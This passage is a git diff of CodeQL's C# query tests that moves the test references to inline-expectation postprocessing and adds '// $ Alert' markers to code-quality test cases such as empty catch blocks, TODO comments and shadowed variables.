b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref index 40da4c8a2d57..b0835a02ad78 100644 --- a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref +++ b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref @@ -1 +1 @@ -ASP/BlockCodeResponseWrite.ql +query: ASP/BlockCodeResponseWrite.ql diff --git a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref index 85395099ce9a..90a69bb4a3b8 100644 --- a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref +++ b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref @@ -1 +1 @@ -ASP/ComplexInlineCode.ql +query: ASP/ComplexInlineCode.ql diff --git a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref index 16700623f76e..ac1b3e989b4c 100644 --- a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref +++ b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref @@ -1 +1 @@ -ASP/NonInternationalizedText.ql +query: ASP/NonInternationalizedText.ql diff --git a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref index 4e98f2ecbaa5..c02b4a97ae47 100644 --- a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref +++ b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref @@ -1 +1 @@ -ASP/SplitControlStructure.ql +query: ASP/SplitControlStructure.ql diff --git a/csharp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref b/csharp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref index 1641277045f7..dc898fca718c 100644 --- a/csharp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref +++ b/csharp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref @@ -1 +1 @@ -AlertSuppression.ql \ No newline at end of file +query: AlertSuppression.ql diff --git a/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependency.qlref b/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependency.qlref index ab1dbe353ef6..273ed4d757a6 100644 --- a/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependency.qlref +++ b/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependency.qlref @@ -1 +1,2 @@ -Architecture/Dependencies/MutualDependency.ql \ No newline at end of file +query: Architecture/Dependencies/MutualDependency.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependencyBad.cs b/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependencyBad.cs index 370b75b45890..4aeddea95ba8 100644 --- a/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependencyBad.cs +++ b/csharp/ql/test/query-tests/Architecture/Dependencies/MutualDependency/MutualDependencyBad.cs @@ -1,6 +1,6 @@ public class Bad { - private class BadModel + private class BadModel // $ Alert { private int i; private BadView view; diff --git a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvy.qlref b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvy.qlref index 9a63a65cd867..6931ecc2f7ec 100644 --- a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvy.qlref +++ b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvy.qlref @@ -1 +1,2 @@ -Architecture/Refactoring Opportunities/FeatureEnvy.ql \ No newline at end of file +query: Architecture/Refactoring Opportunities/FeatureEnvy.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvyBad.cs b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvyBad.cs index 15678d585760..a3f064ff746c 100644 --- a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvyBad.cs +++ b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/FeatureEnvy/FeatureEnvyBad.cs @@ -13,7 +13,7 @@ class Item class Basket { - decimal GetTotalPrice(Item i) + decimal GetTotalPrice(Item i) // $ Alert { if (i.IsOutOfStock) throw new Exception("Item ${i} is out of stock."); diff --git a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.cs b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.cs index 95ff360b3d88..19ce015cdb54 100644 --- a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.cs +++ b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.cs @@ -2,7 +2,7 @@ class InappropriateIntimacy { - class A + class A // $ Alert { public int F1; public int F2; @@ -25,7 +25,7 @@ int M(B b) => b.F1 + b.F2 + b.F3 + b.F4 + b.F5 + b.F6 + b.F7 + b.F8 + b.F9 + b.F10 + b.F11 + b.F12 + b.F13 + b.F14 + b.F15 + b.F16; } - class B + class B // $ Alert { public int F1; public int F2; diff --git a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.qlref b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.qlref index 3b1c4aa5b018..938449179aef 100644 --- a/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.qlref +++ b/csharp/ql/test/query-tests/Architecture/Refactoring Opportunities/InappropriateIntimacy/InappropriateIntimacy.qlref @@ -1 +1,2 @@ -Architecture/Refactoring Opportunities/InappropriateIntimacy.ql \ No newline at end of file +query: Architecture/Refactoring Opportunities/InappropriateIntimacy.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.cs b/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.cs index 93575ea6d8b2..615ec177059e 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.cs @@ -23,5 +23,5 @@ class Class // int y=3; // Comment // int z=4; // Comment // - // end of example + // end of example // $ Alert } diff --git a/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.qlref b/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.qlref index 99318fe478e5..59b1ba27b8e2 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Comments/CommentedOutCode/CommentedOutCode.qlref @@ -1 +1,2 @@ -Bad Practices/Comments/CommentedOutCode.ql +query: Bad Practices/Comments/CommentedOutCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.cs b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.cs index e4f13bb4c64c..2f38e3f42166 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.cs @@ -1,8 +1,8 @@ class C { - // BAD: A TODO comment - // BAD: A FIXME comment + // BAD: A TODO comment // $ Alert + // BAD: A FIXME comment // $ Alert // GOOD: A normal comment // GOOD: Lowercase todo fixme } diff --git a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.qlref b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.qlref index b9114382c5b6..6cdc7b06d6e3 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoComments.qlref @@ -1 +1,2 @@ -Bad Practices/Comments/TodoComments.ql +query: Bad Practices/Comments/TodoComments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoCommentsBad.cs b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoCommentsBad.cs index 172305a3bc73..7a02282cbcca 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoCommentsBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Comments/TodoComments/TodoCommentsBad.cs @@ -4,7 +4,7 @@ class Bad { public static double SolveQuadratic(double a, double b, double c) { - // TODO: handle case where a == 0 + // TODO: handle case where a == 0 // $ Alert return (-b + Math.Sqrt(b * b - 4 * a * c)) / (2 * a); } } diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterface.qlref b/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterface.qlref index 3984405db6bd..b2b0cf600bce 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterface.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterface.qlref @@ -1 +1,2 @@ -Bad Practices/Declarations/EmptyInterface.ql \ No newline at end of file +query: Bad Practices/Declarations/EmptyInterface.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterfaceBad.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterfaceBad.cs index 00f577a62a4f..09fcf1003d71 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterfaceBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/EmptyInterface/EmptyInterfaceBad.cs @@ -2,6 +2,6 @@ class Bad { - interface IsPrintable { } + interface IsPrintable { } // $ Alert class Form1 : IsPrintable { } } diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.cs index cf3062f8af65..a1d2cf846097 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.cs @@ -4,13 +4,13 @@ class C { protected int f; - protected virtual void M1(int f) { } // BAD + protected virtual void M1(int f) { } // BAD // $ Alert int M2(int f) => this.f + f; // GOOD void M3() { - var f = ""; // BAD + var f = ""; // BAD // $ Alert } void M4() @@ -23,13 +23,13 @@ struct S { int f; - void M1(int f) { } // BAD + void M1(int f) { } // BAD // $ Alert int M2(int f) => this.f + f; // GOOD void M3() { - var f = ""; // BAD + var f = ""; // BAD // $ Alert } void M4() @@ -45,9 +45,9 @@ interface I class C2 : C, I { - protected override void M1(int f) { } // BAD + protected override void M1(int f) { } // BAD // $ Alert - public void M5(int f) { } // BAD + public void M5(int f) { } // BAD // $ Alert } class C3 : C, I diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.qlref b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.qlref index 913445e68f24..d7d02b3a9b8d 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMember.qlref @@ -1 +1,2 @@ -Bad Practices/Declarations/LocalScopeVariableShadowsMember.ql \ No newline at end of file +query: Bad Practices/Declarations/LocalScopeVariableShadowsMember.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMemberBad.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMemberBad.cs index 80ce45469375..d2be18995763 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMemberBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/LocalScopeVariableShadowsMember/LocalScopeVariableShadowsMemberBad.cs @@ -7,7 +7,7 @@ class Bad public void DisplayDetails() { - var title = "Person Details"; + var title = "Person Details"; // $ Alert var message = "Title: " + title + "\nName: " + name; MessageBox.Show(message, title); } diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.cs index 0d7d15b56532..0fa96bccb0f2 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.cs @@ -2,7 +2,7 @@ class NoConstantsOnly { - abstract class MathConstants + abstract class MathConstants // $ Alert { public const double Pi = 3.14; // BAD } diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.qlref b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.qlref index 3b7e478699de..b46263c9d51a 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnly.qlref @@ -1 +1,2 @@ -Bad Practices/Declarations/NoConstantsOnly.ql \ No newline at end of file +query: Bad Practices/Declarations/NoConstantsOnly.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnlyBad.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnlyBad.cs index 28f308546ad6..cd92eabd7cf1 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnlyBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/NoConstantsOnly/NoConstantsOnlyBad.cs @@ -2,7 +2,7 @@ class Bad { - abstract class MathConstants + abstract class MathConstants // $ Alert { public static readonly double Pi = 3.14; } diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParameters.qlref b/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParameters.qlref index 867e4e929bd0..37d7e6ce81ee 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParameters.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParameters.qlref @@ -1 +1,2 @@ -Bad Practices/Declarations/TooManyRefParameters.ql \ No newline at end of file +query: Bad Practices/Declarations/TooManyRefParameters.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParametersBad.cs b/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParametersBad.cs index 08da4c6c3345..2d8f65570eea 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParametersBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Declarations/TooManyRefParameters/TooManyRefParametersBad.cs @@ -2,7 +2,7 @@ class Bad { - private static void PopulateDetails(ref string name, ref string address, ref string tel) + private static void PopulateDetails(ref string name, ref string address, ref string tel) // $ Alert { name = "Foo"; address = "23 Bar Street"; diff --git a/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.cs b/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.cs index e57deea7f3d1..812c271e1762 100644 --- a/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.cs +++ b/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.cs @@ -9,7 +9,7 @@ void bad() } catch (Exception) { - } + } // $ Alert } void good() diff --git a/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.qlref b/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.qlref index 734bb1cadf90..3ba3a0114731 100644 --- a/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/EmptyCatchBlock/EmptyCatchBlock.qlref @@ -1 +1,2 @@ -Bad Practices/EmptyCatchBlock.ql \ No newline at end of file +query: Bad Practices/EmptyCatchBlock.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.cs index 795952a82055..7e13d2843edb 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.cs @@ -4,7 +4,7 @@ class AbstractToConcreteCollection { void M(IEnumerable strings) { - var list = (List) strings; // BAD + var list = (List) strings; // BAD // $ Alert var o = (object) strings; // GOOD } } diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.qlref b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.qlref index 307c259dbbb9..26e061e5206e 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollection.qlref @@ -1 +1,2 @@ -Bad Practices/Implementation Hiding/AbstractToConcreteCollection.ql \ No newline at end of file +query: Bad Practices/Implementation Hiding/AbstractToConcreteCollection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollectionBad.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollectionBad.cs index 9538fb9d7a06..92b80ea94d73 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollectionBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/AbstractToConcreteCollection/AbstractToConcreteCollectionBad.cs @@ -5,7 +5,7 @@ class Bad public static void Main(string[] args) { var names = GetNames(); - var list = (List) names; + var list = (List) names; // $ Alert list.Add("Eve"); } diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.cs index 01b05a000278..073ae9086cfd 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.cs @@ -5,7 +5,7 @@ class ExposeRepresentation class Range { private int[] rarray = new int[2]; - public void Set(int[] a) { rarray = a; } + public void Set(int[] a) { rarray = a; } // $ Alert } public static void Main(string[] args) diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.qlref b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.qlref index e8bd17759d48..eafb170539aa 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentation.qlref @@ -1 +1,2 @@ -Bad Practices/Implementation Hiding/ExposeRepresentation.ql \ No newline at end of file +query: Bad Practices/Implementation Hiding/ExposeRepresentation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentationBad.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentationBad.cs index 221f906aa97f..ee56212d1737 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentationBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/ExposeRepresentation/ExposeRepresentationBad.cs @@ -15,7 +15,7 @@ public Range(int min, int max) } } - public int[] Get() => rarray; + public int[] Get() => rarray; // $ Alert } public static void Main(string[] args) diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.cs index 210be320a6ee..5a169d651286 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.cs @@ -10,13 +10,13 @@ class Program public static readonly int[] EmptyArray4; // GOOD: empty - public static readonly int[] NonEmptyArray1 = new int[] { 42 }; // BAD + public static readonly int[] NonEmptyArray1 = new int[] { 42 }; // BAD // $ Alert static readonly int[] NonEmptyArray2 = new int[] { 42 }; // GOOD: private - public static readonly int[] NonEmptyArray3; // BAD + public static readonly int[] NonEmptyArray3; // BAD // $ Alert - public static readonly int[] Array = new int[new Random().Next()]; // BAD + public static readonly int[] Array = new int[new Random().Next()]; // BAD // $ Alert static Program() { diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.qlref b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.qlref index 8dcd9bf72bed..e49a055b5a5e 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArray.qlref @@ -1 +1,2 @@ -Bad Practices/Implementation Hiding/StaticArray.ql \ No newline at end of file +query: Bad Practices/Implementation Hiding/StaticArray.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArrayBad.cs b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArrayBad.cs index fe035d4e4f1d..57d8f21c1956 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArrayBad.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Implementation Hiding/StaticArray/StaticArrayBad.cs @@ -1,6 +1,6 @@ class Bad { - public static readonly string[] Foo = { "hello", "world" }; + public static readonly string[] Foo = { "hello", "world" }; // $ Alert public static void Main(string[] args) { Foo[0] = "goodbye"; diff --git a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/ConfusingMethodNames.qlref b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/ConfusingMethodNames.qlref index 3308ff3889ef..94d4dc04c64f 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/ConfusingMethodNames.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/ConfusingMethodNames.qlref @@ -1 +1,2 @@ -Bad Practices/Naming Conventions/ConfusingMethodNames.ql +query: Bad Practices/Naming Conventions/ConfusingMethodNames.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/Program.cs b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/Program.cs index 7ec82a410312..ead2f8d79fe9 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/Program.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/ConfusingMethodNames/Program.cs @@ -1,6 +1,6 @@ class C1 { - int F() => 0; // BAD: Confusing + int F() => 0; // BAD: Confusing // $ Alert int f() => 0; int G() => 0; // GOOD: Same name int G(int x) => x; diff --git a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.cs b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.cs index a5eb951e148a..052215a052be 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.cs @@ -3,14 +3,14 @@ class VariableNameTooShort { - int F; // BAD + int F; // BAD // $ Alert int Foo; // GOOD Func Func = _ => ""; - void M(int i /* BAD */, int[] args /* GOOD */) + void M(int i /* BAD */, int[] args /* GOOD */) // $ Alert { args.Select(x /* GOOD */ => x + 1); - Func func = x /* BAD */ => x + 1; + Func func = x /* BAD */ => x + 1; // $ Alert } } diff --git a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.qlref b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.qlref index 02458a1b30fc..c80ef4583b05 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Naming Conventions/VariableNameTooShort/VariableNameTooShort.qlref @@ -1 +1,2 @@ -Bad Practices/Naming Conventions/VariableNameTooShort.ql \ No newline at end of file +query: Bad Practices/Naming Conventions/VariableNameTooShort.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs index bf9b19c4a5c7..d3595dfb540f 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs +++ b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.cs @@ -4,7 +4,7 @@ class PathCombine { void bad() { - Path.Combine(@"C:\Users", @"C:\Program Files"); + Path.Combine(@"C:\Users", @"C:\Program Files"); // $ Alert } void good() diff --git a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref index eaf41d047402..db4baecbd0f7 100644 --- a/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/Path Combine/PathCombine.qlref @@ -1 +1,2 @@ -Bad Practices/PathCombine.ql \ No newline at end of file +query: Bad Practices/PathCombine.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.cs b/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.cs index 767c4e484a14..85e8528e939e 100644 --- a/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.cs +++ b/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.cs @@ -42,7 +42,7 @@ class C : B C() { // Method call - f_virtual(); // BAD + f_virtual(); // BAD // $ Alert f_sealed(); // GOOD f_nonvirtual(); // GOOD f_interface(); // GOOD @@ -51,23 +51,23 @@ class C : B // Method access Action a; - a = f_virtual; // BAD + a = f_virtual; // BAD // $ Alert a = f_sealed; // GOOD a = f_nonvirtual; // GOOD a = f_interface; // GOOD // Property access - int i = p_virtual; // BAD + int i = p_virtual; // BAD // $ Alert i = p_sealed; // GOOD i = p_nonvirtual; // GOOD // Indexer access - i = this[0]; // BAD + i = this[0]; // BAD // $ Alert i = this[""]; // GOOD i = this[new object()]; // GOOD // Event access - e_virtual += f_nonvirtual; // BAD + e_virtual += f_nonvirtual; // BAD // $ Alert e_sealed += f_nonvirtual; // GOOD e_nonvirtual += 